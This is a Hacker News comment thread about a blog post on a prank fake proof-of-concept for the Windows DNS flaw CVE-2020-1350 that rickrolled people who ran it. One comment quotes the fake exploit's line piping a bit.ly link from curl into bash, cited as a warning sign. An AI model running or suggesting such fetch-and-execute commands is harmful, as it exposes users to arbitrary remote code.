Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
[flagged] The day I trolled the entire internet: accidental research project CVE-2020-1350 (blog.zsec.uk)
56 points by beefhash on July 15, 2020 | hide | past | favorite | 17 comments


This post requires a lot of context to make sense out of. Unless you are in the security space and familiar with what happened last 36 hours, it probably won't make much sense quickly.

1) Microsoft has a critical flaw in DNS server

2) A security company publishes the info - no public exploit available at this point

3) Someone creates a fake exploit - playing a prank on hackers and other security companies

4) Lots of people ran the prank code or helped spread the existence of the fake exploit

Not sure if this makes it easier to understand- at least I tried. :)


This is very difficult to read and understand.


That's my take. Just random garbage. There is a thread of something in there, but I don't have the time/ energy to quite get it. Something about a fake hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because it's too poorly organized.


Yeah they completely fail to explain the context.

CVE-2020-1350 is a real vulnerability that was published just yesterday:

https://nvd.nist.gov/vuln/detail/CVE-2020-1350

It's a brand new vuln so people would be interested in a proof of concept. The author created a git repo that was nominally a PoC exploit for this vulnerability but was really just a troll, and publicized it on twitter.

Some people ran the "proof of concept" code without reading it first and got trolled. If the author had been malicious they could have done something much worse than rickrolling.

The repo also contains a real fix for the vulnerability.

This is a particularly "amusing" troll because the sort of people who keep up with CVEs and look for proof-of-concept exploits should really know better than to run random code they just got off GitHub without checking what it does.

It's obvious with the most cursory examination of the code in the repo that you shouldn't run it, exploit.sh contains:

   curl -L https://bit.ly/3exifav | bash


Looks to be someone posted a fake exploit and people ran it.


You need a few clicks to get to the meat (Rick Ashley of course) https://github.com/ZephrFish/CVE-2020-1350/blob/master/explo...



I came here hoping that someone would explain what is really going on. Now I feel a bit better since I am not the only one.


Took one glance at the shell script piping curl to bash and red flags went up everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then Twitter and the media started to pick it up and pass it on unverified. I should have been shocked, but I wasn't. I'd love to see the bit.ly stats for the short URLs added to the article.


I'm sure people are stupid, I've seen it myself too many times to count, but how does he know that these weren't executed in a VM? A couple hundred shells isn't so much that I'd rule out that some non-trivial fraction of them were under analysis.


I imagine the reason this doesn't happen too often in serious domains is because the next time the person says/posts anything, will they be believed without checking their claims? Of course, in security, this may even be a good thing?(!) :-)


I think the interesting thing here is that outlets like Vulcan picked it up and wrote about it with authority. Linking to the repo from these "trusted" sources likely gave it a lot more credibility than it would otherwise have received.


Is the blog post fake too? Seriously, this was hard to read...


I was unable to scroll this article on mobile to read it. It seems like it could be interesting, but it’s too bad about the technical obstacles to doing so.


With the numbers shown "the entire internet" is really more than exaggerated and thus the title seems pretty clickbait-y.


TL;DR: posted fake PoC on GitHub. (I think, the post is littered with embedded tweets and memes, super hard to read or make sense of any of it)


Yeah, I think that's the gist. Fake PoC of a CVE, people ran random code, author caught them in the act via a canary token [0] and rickrolled them.

0: https://blog.thinkst.com/p/canarytokensorg-quick-free-detect...




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: